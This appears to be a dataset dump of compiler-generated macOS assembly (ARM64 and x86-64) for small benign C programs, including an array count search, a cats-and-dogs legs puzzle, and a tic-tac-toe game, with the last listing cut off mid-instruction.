%rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" .comm _triangle,41616,4 ## @triangle L_.str.1: ## @.str.1 .asciz "%d\n" .subsections_via_symbols
the_stack_data/9512126.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/100292.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _search ; -- Begin function search .p2align 2 _search: ; @search .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str x0, [sp, #24] str w1, [sp, #20] str w2, [sp, #16] str wzr, [sp, #12] str wzr, [sp, #8] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #8] ldr w9, [sp, #20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_6 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr x8, [sp, #24] ldrsw x9, [sp, #8] ldr w8, [x8, x9, lsl #2] ldr w9, [sp, #16] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB0_4 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 b LBB0_5 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB0_1 LBB0_6: ldr w0, [sp, #12] add sp, sp, #32 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _search ## -- Begin function search .p2align 4, 0x90 _search: ## @search .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movl %edx, -16(%rbp) movl $0, -20(%rbp) movl $0, -24(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movl -24(%rbp), %eax cmpl -12(%rbp), %eax jge LBB0_6 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movq -8(%rbp), %rax movslq -24(%rbp), %rcx movl (%rax,%rcx,4), %eax cmpl -16(%rbp), %eax jne LBB0_4 ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) LBB0_4: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_5 LBB0_5: ## in Loop: Header=BB0_1 Depth=1 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB0_1 LBB0_6: movl -20(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/193892368.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _catsdogs ; -- Begin function catsdogs .p2align 2 _catsdogs: ; @catsdogs .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 str x0, [sp, #32] str x1, [sp, #24] str x2, [sp, #16] str xzr, [sp, #8] str xzr, [sp] ldr x8, [sp, #32] ldr x9, [sp, #24] add x8, x8, x9 lsl x8, x8, #2 str x8, [sp] ldr x8, [sp, #24] ldr x9, [sp, #32] subs x8, x8, x9 cset w8, lt tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldr x9, [sp, #24] mov x8, #4 mul x8, x8, x9 str x8, [sp, #8] b LBB0_6 LBB0_2: ldr x8, [sp, #32] ldr x9, [sp, #24] subs x8, x8, x9, lsl #1 subs x8, x8, #0 cset w8, le tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ldr x9, [sp, #24] mov x8, #4 mul x8, x8, x9 ldr x9, [sp, #32] ldr x11, [sp, #24] mov x10, #2 mul x10, x10, x11 subs x9, x9, x10 add x8, x8, x9, lsl #2 str x8, [sp, #8] b LBB0_5 LBB0_4: ldr x9, [sp, #24] mov x8, #4 mul x8, x8, x9 str x8, [sp, #8] b LBB0_5 LBB0_5: b LBB0_6 LBB0_6: ldr x8, [sp, #16] ldr x9, [sp, #8] subs x8, x8, x9 cset w8, lt tbnz w8, #0, LBB0_10 b LBB0_7 LBB0_7: ldr x8, [sp, #16] ldr x9, [sp] subs x8, x8, x9 cset w8, gt tbnz w8, #0, LBB0_10 b LBB0_8 LBB0_8: ldr x8, [sp, #16] mov x10, #4 sdiv x9, x8, x10 mul x9, x9, x10 subs x8, x8, x9 subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB0_10 b LBB0_9 LBB0_9: str wzr, [sp, #44] b LBB0_11 LBB0_10: mov w8, #1 str w8, [sp, #44] b LBB0_11 LBB0_11: ldr w0, [sp, #44] add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] mov x9, sp add x8, sp, #24 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf str wzr, [sp, #28] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #28] ldr w9, [sp, #24] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_7 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 mov x9, sp sub x8, x29, #16 str x8, [x9] sub x8, x29, #24 str x8, [x9, #8] add x8, sp, #32 str x8, [x9, #16] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf ldur x0, [x29, #-16] ldur x1, [x29, #-24] ldr x2, [sp, #32] bl _catsdogs subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB1_4 b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB1_5 LBB1_4: ; in Loop: Header=BB1_1 Depth=1 adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB1_5 LBB1_5: ; in Loop: Header=BB1_1 Depth=1 b LBB1_6 LBB1_6: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #28] add w8, w8, #1 str w8, [sp, #28] b LBB1_1 LBB1_7: mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" l_.str.1: ; @.str.1 .asciz "%lld %lld %lld" l_.str.2: ; @.str.2 .asciz "yes\n" l_.str.3: ; @.str.3 .asciz "no\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _catsdogs ## -- Begin function catsdogs .p2align 4, 0x90 _catsdogs: ## @catsdogs .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) movq %rdx, -32(%rbp) movq $0, -40(%rbp) movq $0, -48(%rbp) movq -16(%rbp), %rax addq -24(%rbp), %rax shlq $2, %rax movq %rax, -48(%rbp) movq -24(%rbp), %rax cmpq -16(%rbp), %rax jl LBB0_2 ## %bb.1: movq -24(%rbp), %rax shlq $2, %rax movq %rax, -40(%rbp) jmp LBB0_6 LBB0_2: movq -16(%rbp), %rax movq -24(%rbp), %rcx shlq $1, %rcx subq %rcx, %rax cmpq $0, %rax jle LBB0_4 ## %bb.3: movq -24(%rbp), %rax shlq $2, %rax movq -16(%rbp), %rcx movq -24(%rbp), %rdx shlq $1, %rdx subq %rdx, %rcx shlq $2, %rcx addq %rcx, %rax movq %rax, -40(%rbp) jmp LBB0_5 LBB0_4: movq -24(%rbp), %rax shlq $2, %rax movq %rax, -40(%rbp) LBB0_5: jmp LBB0_6 LBB0_6: movq -32(%rbp), %rax cmpq -40(%rbp), %rax jl LBB0_10 ## %bb.7: movq -32(%rbp), %rax cmpq -48(%rbp), %rax jg LBB0_10 ## %bb.8: movq -32(%rbp), %rax movl $4, %ecx cqto idivq %rcx cmpq $0, %rdx jne LBB0_10 ## %bb.9: movl $0, -4(%rbp) jmp LBB0_11 LBB0_10: movl $1, -4(%rbp) LBB0_11: movl -4(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rdi leaq -40(%rbp), %rsi movb $0, %al callq _scanf movl $0, -36(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movl -36(%rbp), %eax cmpl -40(%rbp), %eax jge LBB1_7 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 leaq L_.str.1(%rip), %rdi leaq -16(%rbp), %rsi leaq -24(%rbp), %rdx leaq -32(%rbp), %rcx movb $0, %al callq _scanf movq -16(%rbp), %rdi movq -24(%rbp), %rsi movq -32(%rbp), %rdx callq _catsdogs cmpl $0, %eax jne LBB1_4 ## %bb.3: ## in Loop: Header=BB1_1 Depth=1 leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf jmp LBB1_5 LBB1_4: ## in Loop: Header=BB1_1 Depth=1 leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf LBB1_5: ## in Loop: Header=BB1_1 Depth=1 ## %bb.6: ## in Loop: Header=BB1_1 Depth=1 movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) jmp LBB1_1 LBB1_7: xorl %eax, %eax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" L_.str.1: ## @.str.1 .asciz "%lld %lld %lld" L_.str.2: ## @.str.2 .asciz "yes\n" L_.str.3: ## @.str.3 .asciz "no\n" .subsections_via_symbols
the_stack_data/243893048.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _initializeBoard ; -- Begin function initializeBoard .p2align 2 _initializeBoard: ; @initializeBoard .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str x0, [sp, #24] str x1, [sp, #16] str wzr, [sp, #8] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #8] subs w8, w8, #25 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr x9, [sp, #24] ldrsw x10, [sp, #8] mov w8, #36 str w8, [x9, x10, lsl #2] b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB0_1 LBB0_4: str wzr, [sp, #4] str wzr, [sp, #12] b LBB0_5 LBB0_5: ; =>This Loop Header: Depth=1 ; Child Loop BB0_7 Depth 2 ldr w8, [sp, #12] subs w8, w8, #3 cset w8, ge tbnz w8, #0, LBB0_12 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_5 Depth=1 str wzr, [sp, #8] b LBB0_7 LBB0_7: ; Parent Loop BB0_5 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #8] subs w8, w8, #3 cset w8, ge tbnz w8, #0, LBB0_10 b LBB0_8 LBB0_8: ; in Loop: Header=BB0_7 Depth=2 ldr x8, [sp, #16] ldrsw x9, [sp, #12] mov x10, #3 mul x9, x9, x10 add x8, x8, x9 ldrsw x9, [sp, #8] ldrsb w8, [x8, x9] ldr x9, [sp, #24] ldrsw x11, [sp, #4] mov x10, x11 add w10, w10, #1 str w10, [sp, #4] adrp x10, _convert9To25@PAGE add x10, x10, _convert9To25@PAGEOFF ldrsw x10, [x10, x11, lsl #2] str w8, [x9, x10, lsl #2] b LBB0_9 LBB0_9: ; in Loop: Header=BB0_7 Depth=2 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB0_7 LBB0_10: ; in Loop: Header=BB0_5 Depth=1 b LBB0_11 LBB0_11: ; in Loop: Header=BB0_5 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB0_5 LBB0_12: add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _convert1dTo2d ; -- Begin function convert1dTo2d .p2align 2 _convert1dTo2d: ; @convert1dTo2d .cfi_startproc ; %bb.0: sub sp, sp, #128 .cfi_def_cfa_offset 128 stp x29, x30, [sp, #112] ; 16-byte Folded Spill add x29, sp, #112 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str w0, [sp, #28] ldrsw x9, [sp, #28] adrp x8, _convert25To9@PAGE add x8, x8, _convert25To9@PAGEOFF ldr w8, [x8, x9, lsl #2] str w8, [sp, #24] add x0, sp, #32 str x0, [sp, #16] ; 8-byte Folded Spill adrp x1, l___const.convert1dTo2d.xyMoves@PAGE add x1, x1, l___const.convert1dTo2d.xyMoves@PAGEOFF mov x2, #72 bl _memcpy ldr x8, [sp, #16] ; 8-byte Folded Reload ldrsw x9, [sp, #24] lsl x9, x9, #3 ldr w9, [x8, x9] ; implicit-def: $x10 mov x10, x9 ldrsw x9, [sp, #24] add x8, x8, x9, lsl #3 ldr w9, [x8, #4] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB1_2 b LBB1_1 LBB1_1: bl ___stack_chk_fail LBB1_2: ldp x29, x30, [sp, #112] ; 16-byte Folded Reload add sp, sp, #128 ret .cfi_endproc ; -- End function .globl _otherPlayer ; -- Begin function otherPlayer .p2align 2 _otherPlayer: ; @otherPlayer .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] str wzr, [sp, #8] ldur w8, [x29, #-4] subs w8, w8, #79 cset w8, ne tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: mov w8, #88 str w8, [sp, #8] b LBB2_2 LBB2_2: ldur w8, [x29, #-4] subs w8, w8, #88 cset w8, ne tbnz w8, #0, LBB2_4 b LBB2_3 LBB2_3: mov w8, #79 str w8, [sp, #8] b LBB2_4 LBB2_4: ldur w8, [x29, #-4] subs w8, w8, #79 cset w8, eq tbnz w8, #0, LBB2_7 b LBB2_5 LBB2_5: ldur w8, [x29, #-4] subs w8, w8, #88 cset w8, eq tbnz w8, #0, LBB2_7 b LBB2_6 LBB2_6: mov x9, sp adrp x8, l_.str.2@PAGE add x8, x8, l_.str.2@PAGEOFF str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov x9, sp adrp x8, l_.str.4@PAGE add x8, x8, l_.str.4@PAGEOFF str x8, [x9] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf mov x9, sp adrp x8, l_.str.6@PAGE add x8, x8, l_.str.6@PAGEOFF str x8, [x9] adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf mov x9, sp adrp x8, l_.str.8@PAGE add x8, x8, l_.str.8@PAGEOFF str x8, [x9] adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _printf mov x9, sp mov x8, #92 str x8, [x9] adrp x0, l_.str.9@PAGE add x0, x0, l_.str.9@PAGEOFF bl _printf mov w0, #1 bl _exit LBB2_7: ldr w0, [sp, #8] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _isBoardFull ; -- Begin function isBoardFull .p2align 2 _isBoardFull: ; @isBoardFull .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str x0, [sp, #16] str wzr, [sp, #12] b LBB3_1 LBB3_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] subs w8, w8, #9 cset w8, ge tbnz w8, #0, LBB3_6 b LBB3_2 LBB3_2: ; in Loop: Header=BB3_1 Depth=1 ldr x8, [sp, #16] ldrsw x10, [sp, #12] adrp x9, _convert9To25@PAGE add x9, x9, _convert9To25@PAGEOFF ldrsw x9, [x9, x10, lsl #2] ldr w8, [x8, x9, lsl #2] subs w8, w8, #95 cset w8, ne tbnz w8, #0, LBB3_4 b LBB3_3 LBB3_3: str wzr, [sp, #28] b LBB3_7 LBB3_4: ; in Loop: Header=BB3_1 Depth=1 b LBB3_5 LBB3_5: ; in Loop: Header=BB3_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB3_1 LBB3_6: mov w8, #1 str w8, [sp, #28] b LBB3_7 LBB3_7: ldr w0, [sp, #28] add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _findInDir ; -- Begin function findInDir .p2align 2 _findInDir: ; @findInDir .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str x0, [sp, #24] str w1, [sp, #20] str w2, [sp, #16] str w3, [sp, #12] ldr w8, [sp, #16] str w8, [sp, #8] str wzr, [sp, #4] b LBB4_1 LBB4_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #24] ldrsw x9, [sp, #8] ldr w8, [x8, x9, lsl #2] subs w8, w8, #36 cset w8, eq tbnz w8, #0, LBB4_5 b LBB4_2 LBB4_2: ; in Loop: Header=BB4_1 Depth=1 ldr x8, [sp, #24] ldrsw x9, [sp, #8] ldr w8, [x8, x9, lsl #2] ldr w9, [sp, #20] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB4_4 b LBB4_3 LBB4_3: b LBB4_5 LBB4_4: ; in Loop: Header=BB4_1 Depth=1 ldr w8, [sp, #4] add w8, w8, #1 str w8, [sp, #4] ldr w8, [sp, #8] ldr w9, [sp, #12] add w8, w8, w9 str w8, [sp, #8] b LBB4_1 LBB4_5: ldr w0, [sp, #4] add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _findCollinear3 ; -- Begin function findCollinear3 .p2align 2 _findCollinear3: ; @findCollinear3 .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur w1, [x29, #-12] stur w2, [x29, #-16] ldur w8, [x29, #-16] subs w8, w8, #0 cset w8, gt tbnz w8, #0, LBB5_3 b LBB5_1 LBB5_1: ldur w8, [x29, #-16] subs w8, w8, #25 cset w8, lt tbnz w8, #0, LBB5_3 b LBB5_2 LBB5_2: mov x9, sp adrp x8, l_.str.10@PAGE add x8, x8, l_.str.10@PAGEOFF str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov x9, sp adrp x8, l_.str.4@PAGE add x8, x8, l_.str.4@PAGEOFF str x8, [x9] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf mov x9, sp adrp x8, l_.str.6@PAGE add x8, x8, l_.str.6@PAGEOFF str x8, [x9] adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf mov x9, sp adrp x8, l_.str.8@PAGE add x8, x8, l_.str.8@PAGEOFF str x8, [x9] adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _printf mov x9, sp mov x8, #128 str x8, [x9] adrp x0, l_.str.9@PAGE add x0, x0, l_.str.9@PAGEOFF bl _printf mov w0, #1 bl _exit LBB5_3: stur wzr, [x29, #-20] b LBB5_4 LBB5_4: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-20] subs w8, w8, #4 cset w8, ge tbnz w8, #0, LBB5_9 b LBB5_5 LBB5_5: ; in Loop: Header=BB5_4 Depth=1 ldursw x9, [x29, #-20] adrp x8, _directions@PAGE add x8, x8, _directions@PAGEOFF ldr w8, [x8, x9, lsl #2] str w8, [sp, #24] mov w8, #1 str w8, [sp, #20] ldur x0, [x29, #-8] ldur w1, [x29, #-12] ldur w8, [x29, #-16] ldr w9, [sp, #24] add w2, w8, w9 ldr w3, [sp, #24] bl _findInDir ldr w8, [sp, #20] add w8, w8, w0 str w8, [sp, #20] ldur x0, [x29, #-8] ldur w1, [x29, #-12] ldur w8, [x29, #-16] ldr w9, [sp, #24] subs w2, w8, w9 ldr w9, [sp, #24] mov w8, #-1 mul w3, w8, w9 bl _findInDir ldr w8, [sp, #20] add w8, w8, w0 str w8, [sp, #20] ldr w8, [sp, #20] subs w8, w8, #3 cset w8, ne tbnz w8, #0, LBB5_7 b LBB5_6 LBB5_6: b LBB5_9 LBB5_7: ; in Loop: Header=BB5_4 Depth=1 b LBB5_8 LBB5_8: ; in Loop: Header=BB5_4 Depth=1 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB5_4 LBB5_9: ldr w0, [sp, #20] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _didHeWin ; -- Begin function didHeWin .p2align 2 _didHeWin: ; @didHeWin .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #16] str w1, [sp, #12] str wzr, [sp, #8] b LBB6_1 LBB6_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #8] subs w8, w8, #9 cset w8, ge tbnz w8, #0, LBB6_8 b LBB6_2 LBB6_2: ; in Loop: Header=BB6_1 Depth=1 ldr x8, [sp, #16] ldrsw x10, [sp, #8] adrp x9, _convert9To25@PAGE add x9, x9, _convert9To25@PAGEOFF ldrsw x9, [x9, x10, lsl #2] ldr w8, [x8, x9, lsl #2] ldr w9, [sp, #12] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB6_6 b LBB6_3 LBB6_3: ; in Loop: Header=BB6_1 Depth=1 ldr x0, [sp, #16] ldr w1, [sp, #12] ldrsw x9, [sp, #8] adrp x8, _convert9To25@PAGE add x8, x8, _convert9To25@PAGEOFF ldr w2, [x8, x9, lsl #2] bl _findCollinear3 subs w8, w0, #3 cset w8, ne tbnz w8, #0, LBB6_5 b LBB6_4 LBB6_4: mov w8, #1 stur w8, [x29, #-4] b LBB6_9 LBB6_5: ; in Loop: Header=BB6_1 Depth=1 b LBB6_6 LBB6_6: ; in Loop: Header=BB6_1 Depth=1 b LBB6_7 LBB6_7: ; in Loop: Header=BB6_1 Depth=1 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB6_1 LBB6_8: stur wzr, [x29, #-4] b LBB6_9 LBB6_9: ldur w0, [x29, #-4] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _printboard ; -- Begin function printboard .p2align 2 _printboard: ; @printboard .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] adrp x0, l_.str.11@PAGE add x0, x0, l_.str.11@PAGEOFF bl _printf stur wzr, [x29, #-12] b LBB7_1 LBB7_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-12] subs w8, w8, #9 cset w8, ge tbnz w8, #0, LBB7_6 b LBB7_2 LBB7_2: ; in Loop: Header=BB7_1 Depth=1 ldur x8, [x29, #-8] ldursw x10, [x29, #-12] adrp x9, _convert9To25@PAGE add x9, x9, _convert9To25@PAGEOFF ldrsw x9, [x9, x10, lsl #2] ldr w9, [x8, x9, lsl #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.12@PAGE add x0, x0, l_.str.12@PAGEOFF bl _printf ldur w8, [x29, #-12] add w8, w8, #1 mov w10, #3 sdiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB7_4 b LBB7_3 LBB7_3: ; in Loop: Header=BB7_1 Depth=1 adrp x0, l_.str.11@PAGE add x0, x0, l_.str.11@PAGEOFF bl _printf b LBB7_4 LBB7_4: ; in Loop: Header=BB7_1 Depth=1 b LBB7_5 LBB7_5: ; in Loop: Header=BB7_1 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB7_1 LBB7_6: adrp x0, l_.str.11@PAGE add x0, x0, l_.str.11@PAGEOFF bl _printf ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _chooseMove ; -- Begin function chooseMove .p2align 2 _chooseMove: ; @chooseMove .cfi_startproc ; %bb.0: sub sp, sp, #160 .cfi_def_cfa_offset 160 stp x29, x30, [sp, #144] ; 16-byte Folded Spill add x29, sp, #144 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _US@GOTPAGE ldr x8, [x8, _US@GOTPAGEOFF] str x8, [sp, #24] ; 8-byte Folded Spill adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] stur x0, [x29, #-64] stur w1, [x29, #-68] ldur w8, [x29, #-68] subs w8, w8, #88 cset w8, eq tbnz w8, #0, LBB8_3 b LBB8_1 LBB8_1: ldur w8, [x29, #-68] subs w8, w8, #79 cset w8, eq tbnz w8, #0, LBB8_3 b LBB8_2 LBB8_2: mov x9, sp adrp x8, l_.str.13@PAGE add x8, x8, l_.str.13@PAGEOFF str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov x9, sp adrp x8, l_.str.4@PAGE add x8, x8, l_.str.4@PAGEOFF str x8, [x9] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf mov x9, sp adrp x8, l_.str.6@PAGE add x8, x8, l_.str.6@PAGEOFF str x8, [x9] adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf mov x9, sp adrp x8, l_.str.8@PAGE add x8, x8, l_.str.8@PAGEOFF str x8, [x9] adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _printf mov x9, sp mov x8, #176 str x8, [x9] adrp x0, l_.str.9@PAGE add x0, x0, l_.str.9@PAGEOFF bl _printf mov w0, #1 bl _exit LBB8_3: ldr x9, [sp, #24] ; 8-byte Folded Reload adrp x8, l___const.chooseMove.myBest@PAGE add x8, x8, l___const.chooseMove.myBest@PAGEOFF ldr x8, [x8] str x8, [sp, #64] str wzr, [sp, #44] ldur w8, [x29, #-68] ldr w9, [x9] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB8_5 b LBB8_4 LBB8_4: mov w8, #-1 str w8, [sp, #64] b LBB8_6 LBB8_5: mov w8, #1 str w8, [sp, #64] b LBB8_6 LBB8_6: ldr x8, [sp, #24] ; 8-byte Folded Reload ldur x0, [x29, #-64] ldr w1, [x8] bl _didHeWin subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB8_8 b LBB8_7 LBB8_7: mov w8, #10 stur w8, [x29, #-56] mov w8, #-1 stur w8, [x29, #-52] b LBB8_36 LBB8_8: ldur x0, [x29, #-64] adrp x8, _THEM@GOTPAGE ldr x8, [x8, _THEM@GOTPAGEOFF] ldr w1, [x8] bl _didHeWin subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB8_10 b LBB8_9 LBB8_9: mov w8, #-10 stur w8, [x29, #-56] mov w8, #-1 stur w8, [x29, #-52] b LBB8_36 LBB8_10: ldur x0, [x29, #-64] bl _isBoardFull subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB8_12 b LBB8_11 LBB8_11: stur wzr, [x29, #-56] mov w8, #-1 stur w8, [x29, #-52] b LBB8_36 LBB8_12: b LBB8_13 LBB8_13: b LBB8_14 LBB8_14: str wzr, [sp, #52] b LBB8_15 LBB8_15: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #52] subs w8, w8, #9 cset w8, ge tbnz w8, #0, LBB8_20 b LBB8_16 LBB8_16: ; in Loop: Header=BB8_15 Depth=1 ldur x8, [x29, #-64] ldrsw x10, [sp, #52] adrp x9, _convert9To25@PAGE add x9, x9, _convert9To25@PAGEOFF ldrsw x9, [x9, 